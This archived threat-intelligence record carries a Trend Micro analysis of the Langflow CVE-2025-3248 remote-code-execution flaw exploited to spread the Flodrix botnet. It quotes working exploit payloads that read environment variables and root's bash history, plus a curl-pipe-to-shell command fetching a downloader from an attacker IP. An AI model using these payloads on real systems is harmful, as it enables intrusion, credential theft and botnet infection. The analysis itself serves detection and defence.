{
	"id": "b8161c6d-fe9c-4900-8098-d6de87cd3df1",
	"created_at": "2026-04-06T00:16:54.751125Z",
	"updated_at": "2026-04-10T13:11:54.540462Z",
	"deleted_at": null,
	"sha1_hash": "1871e42352d139b9e16365595cc2558be67ab6a5",
	"title": "Critical Langflow Vulnerability (CVE-2025-3248) Actively Exploited to Deliver Flodrix Botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3754985,
	"plain_text": "Critical Langflow Vulnerability (CVE-2025-3248) Actively\r\nExploited to Deliver Flodrix Botnet\r\nPublished: 2025-06-17 · Archived: 2026-04-05 18:41:01 UTC\r\nSummary:\r\nTrend™ Research has identified an active campaign exploiting CVE-2025-3248 to deliver the Flodrix\r\nbotnet. Attackers use the vulnerability to execute downloader scripts on compromised Langflow servers,\r\nwhich in turn fetch and install the Flodrix malware.\r\nCVE-2025-3248 (CVSS 9.8) is a critical vulnerability in Langflow versions before 1.3.0. Organizations\r\nusing Langflow versions prior to 1.3.0 on public networks are at critical risk, as this vulnerability is being\r\nactively exploited in the wild. Langflow's broad adoption in prototyping and deploying intelligent\r\nautomation makes vulnerable deployments attractive targets.\r\nIf the vulnerability is successfully exploited, threat actors behind the Flodrix botnet can cause full system\r\ncompromise, DDoS attacks, and potential loss or exposure of sensitive information hosted on affected\r\nLangflow servers. \r\nOrganizations running Langflow should immediately patch and upgrade to version 1.3.0 or later, restrict\r\npublic access to Langflow endpoints, and monitor for indicators of compromise associated with the Flodrix\r\nbotnet.\r\nTrend Micro customers are protected from exploitation attempts via available Trend Vision One™ Network\r\nSecurity rules and filters. Trend Vision One customers can also access hunting queries, threat insights, and\r\nthreat intelligence reports to gain rich context and the latest updates on this attack. These protection details\r\ncan be found at the end of this article. \r\nThis blog details research and analysis of an active campaign that exploits a critical unauthenticated remote code\r\nexecution (RCE) vulnerability, CVE-2025-3248, that has been identified in Langflow versions prior to 1.3.0. 
\r\nLangflow is a Python-powered visual framework for building AI applications with over 70,000 GitHub stars, and\r\nits versions prior to 1.3.0 contain a flaw in its code validation mechanism that permits arbitrary code execution.\r\nUnauthenticated attackers can exploit this vulnerability by crafting malicious POST requests to the\r\n/api/v1/validate/code endpoint. \r\nThe malicious payload in our investigation was found embedded within argument defaults or decorators of a\r\nPython function definition. Since Langflow does not enforce input validation or sandboxing, these payloads are\r\ncompiled and executed within the server's context, leading to RCE.\r\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its\r\nKnown Exploited Vulnerabilities (KEV) catalog on May 5, 2025. Table 1 summarizes the details of the\r\nvulnerability that we discuss further in this blog.\r\nCVE Identifier CVE-2025-3248\r\nhttps://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html\r\nPage 1 of 25\n\nCVSS Score 9.8 (Critical)\r\nVector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\nAffected Versions Langflow versions before 1.3.0\r\nVulnerability Type Missing authentication, Code Injection\r\nImpact Allows remote unauthenticated attackers to execute arbitrary code\r\nTable 1. CVE-2025-3248 vulnerability details\r\nTechnical analysis of the CVE-2025-3248 exploit\r\nBased on our investigation and the command execution timeline, cybercriminals initiated the attack by first\r\ngathering a list of IP addresses and ports of publicly exposed Langflow servers, potentially using tools like Shodan\r\nor FOFA.\r\nThe attacker uses an open-source code proof of concept (PoC) from https://github.com/verylazytech/CVE-2025-3248\r\nto obtain remote shell access on the vulnerable systems. 
The attacker then runs various reconnaissance bash\r\ncommands on the infected system and sends the results back to the command-and-control (C\u0026C) server.\r\nThe attacker then downloads and executes the Flodrix Botnet on the infected system. Once the malware is\r\nsuccessfully installed and establishes a connection with the command and control (C\u0026C) server, it can receive\r\ncommands over TCP to launch various distributed denial-of-service (DDoS) attacks. The payload will terminate\r\nand delete itself unless a valid parameter is provided.\r\nBased on these steps, the attacker is likely profiling all vulnerable servers and using the collected data to identify\r\nhigh-value targets for future infections. During the investigation, we observed that the trojan downloader script\r\nexecuted the final payload with an invalid argument. As a result, after initial execution and establishing a\r\nconnection, the malware terminated and deleted itself. This behavior is designed to determine which payload\r\nsuccessfully executes on the target system architecture and can initiate communication with the C\u0026C server.\r\nThe vulnerability resides specifically within the /api/v1/validate/code endpoint. This endpoint, designed to\r\nvalidate Python code snippets, fails to implement adequate authentication. It processes user-supplied code by first\r\nparsing it into an Abstract Syntax Tree (AST) using ast.parse(). Subsequently, it employs Python's compile()\r\nfunction to convert the AST into executable bytecode, which is then executed via exec().\r\nMalicious payloads can be embedded within these syntactic structures. When Langflow's compile() function\r\nprocesses an AST node representing a function with such embedded payloads, the malicious code is executed in\r\nthe server's context. 
This occurs without any authentication, allowing remote attackers to submit crafted POST\r\nrequests to achieve RCE.\r\nFigure 2. CVE-2025-3248 Remote Code Execution flow.\r\nThe following list details specific Python payloads in the exploitation attempts we investigated against Langflow's\r\nvulnerable endpoint. These payloads, embedded within function default arguments or decorators, demonstrate\r\nvarious reconnaissance and initial access techniques.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"whoami\\\", shell=True))')\r\nCommand executed: whoami\r\nDetails: Identifies the current user/effective user ID of the process running the Langflow application on the\r\ncompromised system. This is a common first step in reconnaissance to understand privileges.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"printenv\\\", shell=True))')\r\nCommand executed: printenv\r\nDetails: Dumps all environment variables. This can reveal sensitive information such as API keys, cloud\r\ncredentials, database connection strings, or other configuration details accessible to the Langflow process.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"cat /root/.bash_history\\\", shell=True))')\r\nCommand executed: cat /root/.bash_history\r\nDetails: Attempts to read the Bash history file of the root user. This could expose previously executed\r\ncommands, revealing insights into the system's administration, installed software, or potential\r\nmisconfigurations.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"ip addr show\\\", shell=True))')\r\nCommand executed: ip addr show\r\nDetails: Displays network interface information and IP addresses configured on the system. 
This is crucial\r\nfor network reconnaissance, helping attackers map the internal network and identify potential targets or\r\negress points.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"ifconfig\\\", shell=True))')\r\nCommand executed: ifconfig\r\nDetails: Similar to ip addr show, this provides details about network interfaces, including IP addresses,\r\nMAC addresses, and network statistics. Often used for basic network enumeration.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"systemctl status sshd\\\", shell=True))')\r\nCommand executed: systemctl status sshd\r\nDetails: Checks the status of the SSH daemon service. This command is used to determine if SSH is\r\nrunning, which could indicate a potential remote access vector for the attacker.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"capsh --print\\\", shell=True))')\r\nCommand executed: capsh --print\r\nDetails: Displays the current capabilities of the process. Understanding process capabilities (e.g.,\r\nCAP_NET_BIND_SERVICE, CAP_SYS_PTRACE) can help attackers identify further escalation paths or\r\nprivileged operations they can perform.\r\nexec('raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"curl -s http://\u003cIP\u003e:\u003cPORT\u003e/docker | sh\\\", shell=True))')\r\nCommand executed: curl -s http://80.66.75.121:25565/docker | sh\r\nDetails: This command downloads and executes a trojan downloader script named 'docker' from an attacker-controlled server.\r\nFigure 3. CVE-2025-3248 RCE traffic.\r\nWe observed that the attacker used an open-source code proof of concept (PoC) from\r\nhttps://github.com/verylazytech/CVE-2025-3248 to interact with the vulnerable systems to enable code execution\r\nand payload delivery as part of the attack. 
Figures 4 and 5 demonstrate the PoC usage.\r\nFigure 4. Python proof of concept (PoC) snippet from GitHub PoC for CVE-2025-3248.\r\nFigure 5. CVE-2025-3248 PoC script execution.\r\nThe attacker then runs various reconnaissance bash commands on the infected system and sends the results back\r\nto the C\u0026C server.\r\nCVE-2025-3248 patch analysis\r\nA security update has been released for CVE-2025-3248, which is included in Langflow version 1.3.0. It resolves\r\nthe authentication vulnerability in the /api/v1/validate/code endpoint and implements an authentication\r\nrequirement by adding a new parameter, _current_user: CurrentActiveUser, to the post_validate_code function.\r\nThis parameter acts as an authentication dependency, verifying the user's identity and session validity before\r\npermitting access.\r\nFigure 6. Logs of the CVE-2025-3248 patch update.\r\nThe CurrentActiveUser dependency checks for an authenticated user session, triggering an exception if the user is\r\nnot authenticated. As a result, this update ensures that only authorized users can access the /api/v1/validate/code\r\nendpoint.\r\nThe authentication flow begins when a request is made to the /api/v1/validate/code endpoint. FastAPI parses the\r\nfunction signature and detects the _current_user: CurrentActiveUser dependency. It immediately pauses execution\r\nof post_validate_code.\r\nAuthentication is triggered when FastAPI invokes the underlying logic for CurrentActiveUser to satisfy the\r\ndependency. This logic's primary responsibility is to authenticate the user. 
It inspects the incoming request for\r\ncredentials, specifically looking for:\r\nA JWT Bearer token in the Authorization header.\r\nAn x-api-key provided in the request headers or as a query parameter.\r\nCredentials are then validated, with two possible scenarios:\r\nFailure. If neither credential type is found, or if the provided token/key is invalid, the dependency raises an\r\nHTTPException. The request is immediately rejected with a 401 Unauthorized or 403 Forbidden error, and\r\nthe endpoint's code is never reached.\r\nSuccess. If the credentials are valid, the dependency retrieves the corresponding user from the database.\r\nIn the case of a successful credential validation, the retrieved user object is then checked to ensure its is_active\r\nflag is true. If the user is inactive, the process is halted with another HTTPException. \r\nOnly if the user is successfully authenticated and active does the dependency logic complete.\r\nFastAPI then considers the dependency \"satisfied\" and finally proceeds to execute the code within the\r\npost_validate_code function.\r\nFigure 7. Langflow source code update.\r\nAttack chain analysis\r\nName docker\r\nMD5 eaf854b9d232566e82a805e9be8b2bf2\r\nSHA-1 e367cee9e02690509b4acdf7060f1a4387d85ec7\r\nSHA-256 ec0f2960164cdcf265ed78e66476459337c03acb469b6b302e1e8ae01c35d7ec\r\nSize 700 bytes\r\nFile Type Bash Script\r\nTable 2. Bash script downloader details\r\nUpon successfully exploiting CVE-2025-3248, the threat actor deploys a bash shell script named \"docker\". This\r\nscript is designed to download and execute ELF binaries of the Flodrix botnet targeting multiple system architectures.\r\nIt attempts to run the script /tmp/e1x with the argument _docker and then checks the output for the string\r\n“Upgrading Kernel..”. 
If this string is present, the condition passes, and the script deletes the downloaded file. If\r\nnot, those commands are skipped.\r\nFigure 8. Bash script downloader code.\r\nDuring our investigation, we identified that the threat actor is hosting different downloader scripts on the same\r\nhost 80[.]66[.]75[.]121 that serve the same purpose. This indicates that development is ongoing and\r\nmultiple campaigns are active.\r\nName deez\r\nMD5 176f293dd15b9cf87ff1b8ba70d98bcf\r\nSHA-1 7823b91efceedaf0e81856c735f13ae45b494909\r\nSHA-256 64927195d388bf6a1042c4d689bcb2c218320e2fa93a2dcc065571ade3bb3bd3\r\nSize 5202 bytes\r\nFile Type Bash Script\r\nTable 3. Downloader variant details.\r\nThe script begins by terminating specific processes named \"busybox,\" \"systemd,\" and \"watchdog\" if their process\r\nIDs (PIDs) are greater than 500. This condition likely aims to avoid early-started critical system processes,\r\nensuring the script targets dynamically created or user-related processes that could interfere with its operations,\r\nsuch as security utilities.\r\nIt then sets up variables, including the server IP and ports for HTTP, TFTP, and FTP, specifying several file names\r\ncorresponding to various system architectures. The script changes the working directory to /tmp, removes any pre-existing files that match the e1x.* pattern, and defines several utility functions. These functions check the\r\nexistence of commands like wget, curl, and tftp, verify if they execute without being killed, and determine the best\r\nmethod available for downloading files.\r\nThe core functionality involves the download_with_fallback function, which attempts to download files using\r\nvarious defined methods. 
If the primary method fails, it falls back to using secondary methods like busybox\r\nversions of wget or curl, and as a last resort, tftp or ftpget. \r\nOnce a file is downloaded, it tries to execute the file using the execute_file function, which changes file\r\npermissions to make it executable and checks for certain output messages to determine the success or failure of the\r\nexecution. The script processes each file in sequence, attempting to download and execute until a successful\r\nexecution is achieved.\r\nFigure 9. Downloader variant.\r\nFlodrix botnet payload analysis\r\nName e1x.x86_64\r\nMD5 82d8bc51a89118e599189b759572459f\r\nSHA-1 d703ec4c4d11c7a7fc2fcf4a4b8776862a3000b5\r\nSHA-256 912573354e6ed5d744f490847b66cb63654d037ef595c147fc5a4369fef3bfee\r\nSize 86032 bytes\r\nFile Type ELF\r\nTable 4. Flodrix botnet details\r\nOur analysis indicates that the downloaded payload is an evolving variant of the LeetHozer malware family. This\r\nvariant employs multiple stealth techniques, including self-deletion and artifact removal, to minimize forensic\r\ntraces and hinder detection. It also uses string obfuscation to conceal command-and-control (C\u0026C) server\r\naddresses and other critical indicators, complicating analysis efforts. \r\nNotably, this version supports dual communication channels with its C\u0026C infrastructure over both TCP and UDP\r\nchannels. Once connected, it can receive commands over TCP to launch various distributed denial-of-service\r\n(DDoS) attacks. 
\r\nAdditionally, we have found some similarities with the LeetHozer botnet covered by the netlab360 team (md5:\r\n57212f7e253ecebd39ce5a8a6bd5d2df), and we describe the similarities and differences later in this research.\r\nUpon execution, the malware decrypts an obfuscated string using an XOR-based algorithm with the key\r\n“qE6MGAbI”, the same key used by the LeetHozer botnet. This reveals the message “Upgrading Kernel..”, which is\r\nimmediately written to standard output. This message acts as a signal indicating successful execution of the\r\nmalware binary to the malware's downloader script. \r\nNext, the malware retrieves its own process ID and allocates a clean memory buffer to handle any provided\r\ncommand-line arguments. If a single argument is present, it is copied into memory and promptly zeroed out. \r\nThe malware also performs self-deletion, erasing its own binary from disk by referencing its full execution path.\r\nThese behaviors are anti-forensic techniques, designed to hinder post-infection analysis.\r\nFigure 11. Decrypting the Upgrading Kernel string and removing the malware execution path\r\nFollowing this, the malware searches for a hidden file named “.system_idle”, with the filename being decrypted\r\nduring runtime. This file is used to store the malware's process ID (PID) and serves as a tracker to determine if the\r\nmalware has been previously executed. The presence of this file indicates a prior instance of execution. If found,\r\nthe malware reads the file line by line, where each line is expected to contain one or two comma-separated PIDs. \r\nFor every valid PID identified, the malware checks if the corresponding process is still running. If it is, the\r\nmalware forcibly terminates it using the SIGKILL signal. After completing this operation, the “.system_idle” file is\r\ndeleted. 
This routine not only prevents duplicate or conflicting instances of the malware from running but also\r\nprovides a self-termination or cleanup mechanism, allowing the malware to discreetly remove its own artifacts.\r\nFigure 12. Store PID and PPID in the hidden file\r\nThe malware then attempts to fork child processes with randomly generated names and parameters. The malware\r\nalso performs an anti-debugging technique: it forks a new process, and if the new process is not a child, it\r\nterminates the parent process, which breaks debuggers. \r\nIf the malware successfully creates the child processes, it proceeds to write the process ID to the hidden file and\r\nperforms its malicious activities. The malware decrypts embedded C\u0026C server addresses using the same XOR key\r\nand initializes the connection with the C\u0026C.\r\nFigure 13. Decrypting C\u0026C IP addresses with hardcoded XOR Key\r\nThe malware supports two communication channels with its C\u0026C server: one over standard TCP and another over\r\nthe Tor network. By default, it establishes a socket connection with the C\u0026C server using the TCP channel.\r\nFigure 14. Initialize a TCP socket with the C\u0026C.\r\nThe malware then tries to connect to one of the C\u0026C servers over port 54707. Once the malware successfully\r\nconnects to the C\u0026C server, it sends the first TCP request. \r\nFigure 15. 
Constructing and sending the first request pseudocode.\r\nThe packet has a fixed length of 255 bytes and includes hardcoded magic bytes 0x3A20, 0xB042, and 0x0000.\r\nFigure 16 shows the structure of the packet. \r\nFigure 16. First request structure.\r\nThe checksum is computed by summing 12 consecutive 16-bit words, then folding the result into 16 bits by\r\nadding the high and low halves. The final checksum is the lower 16 bits of this folded value. \r\nUpon receiving a response from the C\u0026C server, the malware analyzes the first 32 bytes of the 255-byte reply\r\npacket. It begins by checking whether the first four bytes (the response header) are equal to 0xFF0103FF. If this\r\ncondition is met, the malware terminates its execution and closes the socket connection. If not, it proceeds to\r\nverify the response by checking if bytes 4-7 equal 0x8931 or bytes 8-11 equal 0xB043. \r\nIf either condition is satisfied, the response is considered valid. The malware then modifies the received packet to\r\nconstruct the second request: it sets bytes 8-11 to 0x8932, updates the first two bytes to 0x3A20 instead of the\r\nsource port, and assigns a new request number 0x0002.\r\nThen, the malware sends the second request. The malware checks if the C\u0026C replies with a valid response as in\r\nthe first response, this time by checking if bytes 4-7 equal 0x4EEB or bytes 8-11 equal 0x8932. If either condition\r\nis satisfied, the response is considered valid, and the bot is active and ready to receive commands from the C\u0026C.\r\nFigure 17. Malware requests and responses handling pseudocode.\r\nThe malware then begins sending periodic heartbeat requests, each consisting of a single byte with the value 0x00.\r\nIn response to the first heartbeat, the C\u0026C server typically replies with 0x01, instructing the bot to send the\r\noriginal parameter it was launched with. 
If the malware was executed without any parameters, it sends the string\r\n\"null\" by default.\r\nFigure 18. Send parameter information to the C\u0026C\r\nThe malware can receive commands from its C\u0026C server to launch various DDoS attacks. Upon receiving a\r\nresponse packet from the C\u0026C, the malware parses it to extract critical attack parameters such as the attack type,\r\ntarget IP address, target port, and attack duration.\r\nFigure 19. Parse C\u0026C commands and extract attack details\r\nThese pieces of information are stored in a structured format. The number of structures is calculated by XORing\r\nthe first byte 0x3e with the fifth byte 0x3f. Once the count is determined, the malware proceeds to extract and\r\npopulate each structure accordingly. Each structure consists of a structure header and a structure value. Each structure\r\nbegins with 0x0001 or 0x0002, which represents the structure type.\r\nFigure 20. Anatomy of attack structures\r\nThe malware can receive different types of configurations from the C\u0026C. Table 3 shows the values found and their\r\ncorresponding purpose.\r\nStructure types\r\n0x0001 Add 4 bytes of Zero Padding\r\n0x0002 No Zero bytes padding\r\nValue Types\r\n0x0004 Attack Type tcpraw, udpplain, handshake, tcplegit, ts3, udp\r\n0x0005 Attack Duration\r\n0x0006 Target IP\r\n0x000C Target Port\r\nTable 5. Structure and value types\r\nThe malware can perform various DDoS attacks based on the configuration received from the C\u0026C. The\r\nsupported DDoS attacks are tcpraw, udpplain, handshake, tcplegit, ts3, and udp.\r\nFigure 21. 
DDoS attack types\r\nNotable changes in the Flodrix botnet\r\nWhile the Flodrix botnet sample we investigated showed similarities with the variant analyzed by the netlab360 team\r\n(md5: 57212f7e253ecebd39ce5a8a6bd5d2df), such as the string decryption mechanism, XOR key, and traffic\r\nstructure, it also presents distinct differences, which we discuss in this section. \r\nWe observed changes in the response headers as shown in Figure 22.\r\nFigure 22. A comparison between the magic headers of the malware versions.\r\nThe new variant also appears to support additional configuration options; however, due to limited access to the\r\nC\u0026C server, these configurations could not be fully identified.\r\nFigure 23. A comparison between configurations of the malware versions.\r\nAnother significant change is the introduction of new DDoS attack types, which are now also encrypted, adding a\r\nfurther layer of obfuscation.\r\nFigure 24. A comparison of attack types with a previous version of the malware.\r\nThe new sample also notably enumerates the running processes by opening the /proc directory to access all running\r\nprocesses. It iterates through the directory entries to filter out valid process identifiers (PIDs) and fetches detailed\r\ninformation about them, such as command names, execution paths, and command-line arguments. \r\nThen, the malware compares each running process with specific processes such as init, systemd, watchdog, busybox,\r\nand /bin/busybox. Additionally, it checks if the process is running from the /tmp directory. 
If a process matches the\r\nconditions, it sends signals to terminate it and sends a notification message that starts with “KILLDETAIL|” to the\r\nC\u0026C over UDP port 50445 with the terminated process details.\r\nFigure 25. Process termination and notification\r\nFigure 26 illustrates the notification request with process details:\r\nFigure 26. UDP notification traffic\r\nThe following table shows the structure of the UDP notification traffic:\r\nKILLDETAIL|PID|PPID|SIGNAL|COMM|EXE|CWD|CMDLINE|SOCKET_COUNT\r\nKILLDETAIL Hardcoded value\r\nPID (Process ID) Obtained from the /proc directory\r\nPPID (Parent Process ID) Obtained from the /proc/%d/stat file with %c %d options\r\nSignal (Action) Hardcoded values. Possible values (2,3,4,5,8,9)\r\nCOMM (Process Name) Obtained from the /proc/%d/comm file\r\nEXE (Process Executable Path) Obtained from the /proc/%d/exe file\r\nCWD (Current Working Directory) Obtained from the /proc/%d/cwd file\r\nCMDLINE (Command Line) Obtained from the /proc/%d/cmdline file\r\nNumber of sockets Obtained from the /proc/%d/fd/%s file\r\nTable 6. UDP notification request anatomy\r\nProactive security with Trend Vision One™\r\nTrend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber\r\nrisk exposure management, security operations, and robust layered protection. This comprehensive approach helps\r\nyou predict and prevent threats, accelerating proactive security outcomes across your entire digital estate.\r\nBacked by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity\r\nAI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. 
Security\r\nleaders can benchmark their posture and showcase continuous improvement to stakeholders.\r\nTrend protections for CVE-2025-3248\r\nThe following protections have been available to Trend Micro customers:\r\nTrend Vision One™ Network Security\r\nTippingPoint Intrusion Prevention Filters:\r\n46063: TCP: Trojan.Linux.FlodrixBot.A Runtime Detection\r\n46064: UDP: Trojan.Linux.FlodrixBot.A Runtime Detection\r\n45744: HTTP: Langflow Code Injection Vulnerability\r\nDeep Discovery Inspector (DDI) Relevance Rule: 5411: CVE-2025-3248 - LANGFLOW RCE - HTTP (Request)\r\nTrend Micro™ Threat Intelligence\r\nTo stay ahead of evolving threats, Trend customers can access Threat Insights, which provides the latest insights\r\nfrom Trend Research on emerging threats and threat actors.\r\nThreat Insights\r\nEmerging Threats: Critical Langflow Vulnerability [CVE-2025-3248] Actively Exploited to Deliver Flodrix\r\nBotnet\r\nHunting Queries\r\nTrend Vision One Search App\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this\r\nblog post with data in their environment.\r\nC\u0026C connections of Flodrix Botnet\r\neventSubId:602 AND objectIp:(80.66.75.121 OR 45.61.137.226 OR 206.71.149.179 OR 188.166.68.21)\r\nMore hunting queries are available for Vision One customers with Threat Insights entitlement enabled.\r\nIndicators of Compromise (IOCs)\r\nYou can find the IoCs for this blog here.\r\nSource: https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html"
	],
	"report_names": [
		"langflow-vulnerability-flodric-botnet.html"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434614,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1871e42352d139b9e16365595cc2558be67ab6a5.pdf",
		"text": "https://archive.orkl.eu/1871e42352d139b9e16365595cc2558be67ab6a5.txt",
		"img": "https://archive.orkl.eu/1871e42352d139b9e16365595cc2558be67ab6a5.jpg"
	}
}